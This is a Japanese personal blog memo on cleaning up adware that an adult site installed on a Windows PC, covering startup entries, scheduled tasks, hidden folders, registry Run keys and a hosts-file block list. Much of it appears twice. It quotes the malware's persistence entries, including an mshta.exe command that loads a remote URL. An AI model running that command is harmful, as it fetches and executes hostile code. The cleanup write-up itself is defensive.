※※※ 以下の内容は個人的なメモです。責任は取れません。※※※
● Glary Utilities
● レジストリエディタ
● エクスプローラ
● ノートパッド(hostsファイル書き換え)
・ Spybot-S&D
・ CCleaner
該当しそうな(1)~(4)の内容を削除した。
(ユーザ名【00000】は該当のユーザ名で適当に書き換えた。)
(1)
SystemBootMzcAAKK4KYKM1M5AlUfwqPKtSmDVSA5s
C:\Users\00000\UserProfile\SystemBoot.lnk
(2)
RegWriteMzcAAKK4KYKM1M5AlUfwqPKtSmDVSA5s
C:\Users\00000\SoftRecovery\RegWrite.lnk
(3)
RegWriteMzcAAKK4KYKM1M5AlUfwqPKtSmDVSA5s
REG IMPORT C:\Users\00000\SoftRecovery\datMzcAAKK4KYKM1M5AlUfwqPKtSmDVSA5s.reg
(4)
RegWrite
C:\Windows\System32\mshta.exe http://lrods.info/set_inf2.php?cccid=MzcAAKK4KYKM1M5AlUfwqPKtSmDVSA5s
勝手にソフトなどをダウンロードしたり、画像を表示させないようにhostsに該当のアダルトサイトURLでのアクセスをブロックする。hostsファイルは【管理者権限で開く】。
hostsファイルの場所は大体 → C:\WINDOWS\system32\drivers\etc\hosts にある。
lrods.info → 今回のアダルトサイト【激エロムービー】
IP :: 180.131.106.5 (SAKURA Internet Inc.)
DNS :: DNSV.JP (お名前.com)
ドメイン情報から調べたところ、同様に下記のURLが全て同様のサーバを利用している様子。hostsファイルにアクセス出来ないように追加。
スタートボタン → プログラムとファイルの検索 → taskschd.msc
タスクスケジューラーの操作の項目を確認しながら、該当する
1:: RegWrite
2:: Systemboot
の項を削除
エクスプローラ → ツール → フォルダオプション → 表示タブ → ファイルとフォルダの表示 → 隠しファイル、隠しフォルダー、および隠しドライブを表示する
ユーザフォルダ内の隠しフォルダからさっきGlary Utilitiesでスタートアップで確認した
1:: UserProfile
2:: SoftRecovery
が表示されたので、削除。
UserProfile\mshost.exeが残ったので様子見で残す。
(再起動後、特にアダルトサイトの情報が出てこなかったので残した。)
スタートボタン → プログラムとファイルの検索 → regedit
regedit起動 → 編集 → 検索
アダルトサイトによってインストールされたソフトの乱数の様な文字を入れて検索。
今回は:: fwqPKtSmDVSA5s
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="C:\\Program Files\\Windows Sidebar\\sidebar.exe /autoRun"
"SystemBootMzcAAKK4KYKM1M5AlUfwqPKtSmDVSA5s"="C:\\Users\\00000\\UserProfile\\SystemBoot.lnk"
"RegWriteMzcAAKK4KYKM1M5AlUfwqPKtSmDVSA5s"="C:\\Users\\00000\\SoftRecovery\\RegWrite.lnk"
"Sidebar"="C:\\Program Files\\Windows Sidebar\\sidebar.exe /autoRun"以外を削除。
この様なパソコンは他にも色々と有りそうなので要らないファイルなどを掃除。
・ Spybot-S&D でスパイウェア検索
・ CCleanerでファイルとレジストリを掃除
・ Glary Utilitiesの1-クリックメンテナンス
・ Glary Utilities
・ Spybot-S&D
・ CCleaner
今回使ったソフト(●必要、・おまけ)
● Glary Utilities
● レジストリエディタ
● エクスプローラ
● ノートパッド(hostsファイル書き換え)
・ Spybot-S&D
・ CCleaner
Glary Utilitiesでスタートアップ確認
該当しそうな(1)~(4)の内容を削除した。
(ユーザ名【00000】は該当のユーザ名で適当に書き換えた。)
(1)
SystemBootMzcAAKK4KYKM1M5AlUfwqPKtSmDVSA5s
C:\Users\00000\UserProfile\SystemBoot.lnk
(2)
RegWriteMzcAAKK4KYKM1M5AlUfwqPKtSmDVSA5s
C:\Users\00000\SoftRecovery\RegWrite.lnk
(3)
RegWriteMzcAAKK4KYKM1M5AlUfwqPKtSmDVSA5s
REG IMPORT C:\Users\00000\SoftRecovery\datMzcAAKK4KYKM1M5AlUfwqPKtSmDVSA5s.reg
(4)
RegWrite
C:\Windows\System32\mshta.exe http://lrods.info/set_inf2.php?cccid=MzcAAKK4KYKM1M5AlUfwqPKtSmDVSA5s
hostsファイルに追加
勝手にソフトなどをダウンロードしたり、画像を表示させないようにhostsに該当のアダルトサイトURLでのアクセスをブロックする。hostsファイルは【管理者権限で開く】。
hostsファイルの場所は大体 → C:\WINDOWS\system32\drivers\etc\hosts にある。
lrods.info → 今回のアダルトサイト【激エロムービー】
IP :: 180.131.106.5 (SAKURA Internet Inc.)
DNS :: DNSV.JP (お名前.com)
ドメイン情報から調べたところ、同様に下記のURLが全て同様のサーバを利用している様子。hostsファイルにアクセス出来ないように追加。
hosts に追加したリスト
------------------------------
#ブロック アダルトサイト(2012-04-18 手動追加)
0.0.0.0 lrods.info
0.0.0.0 JegTp.info
0.0.0.0 GrKoh.info
0.0.0.0 hJsWe.info
0.0.0.0 LrOds.info
0.0.0.0 GokEv.info
0.0.0.0 hjswe.info
0.0.0.0 mmerd.info
0.0.0.0 htsge.info
0.0.0.0 mrwiq.info
0.0.0.0 jegtp.info
0.0.0.0 gtohu.info
0.0.0.0 paety.info
0.0.0.0 grkoh.info
0.0.0.0 htSgE.info
0.0.0.0 PaEty.info
0.0.0.0 MrWiq.info
0.0.0.0 gToHu.info
0.0.0.0 MmErd.info
0.0.0.0 gokev.info
------------------------------
タスクスケジューラー(%windir%\system32\taskschd.msc)
スタートボタン → プログラムとファイルの検索 → taskschd.msc
タスクスケジューラーの操作の項目を確認しながら、該当する
1:: RegWrite
2:: Systemboot
の項を削除
エクスプローラで怪しい内容を削除
エクスプローラ → ツール → フォルダオプション → 表示タブ → ファイルとフォルダの表示 → 隠しファイル、隠しフォルダー、および隠しドライブを表示する
ユーザフォルダ内の隠しフォルダからさっきGlary Utilitiesでスタートアップで確認した
1:: UserProfile
2:: SoftRecovery
が表示されたので、削除。
UserProfile\mshost.exeが残ったので様子見で残す。
(再起動後、特にアダルトサイトの情報が出てこなかったので残した。)
レジストリ確認
スタートボタン → プログラムとファイルの検索 → regedit
regedit起動 → 編集 → 検索
アダルトサイトによってインストールされたソフトの乱数の様な文字を入れて検索。
今回は:: fwqPKtSmDVSA5s
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="C:\\Program Files\\Windows Sidebar\\sidebar.exe /autoRun"
"SystemBootMzcAAKK4KYKM1M5AlUfwqPKtSmDVSA5s"="C:\\Users\\00000\\UserProfile\\SystemBoot.lnk"
"RegWriteMzcAAKK4KYKM1M5AlUfwqPKtSmDVSA5s"="C:\\Users\\00000\\SoftRecovery\\RegWrite.lnk"
"Sidebar"="C:\\Program Files\\Windows Sidebar\\sidebar.exe /autoRun"以外を削除。
掃除(おまけ)
この様なパソコンは他にも色々と有りそうなので要らないファイルなどを掃除。
・ Spybot-S&D でスパイウェア検索
・ CCleanerでファイルとレジストリを掃除
・ Glary Utilitiesの1-クリックメンテナンス
リンク
・ Glary Utilities
・ Spybot-S&D
・ CCleaner
PR
最新記事
(01/12)
(05/25)
(04/23)
(04/04)
(05/15)
カテゴリー
最新TB
最新CM
[03/18 p2sy1zg700]
[03/17 z4lj5vn831]
[03/06 schutz]
[10/08 Von]
[09/16 名前未入力]
ブログ内検索
PR
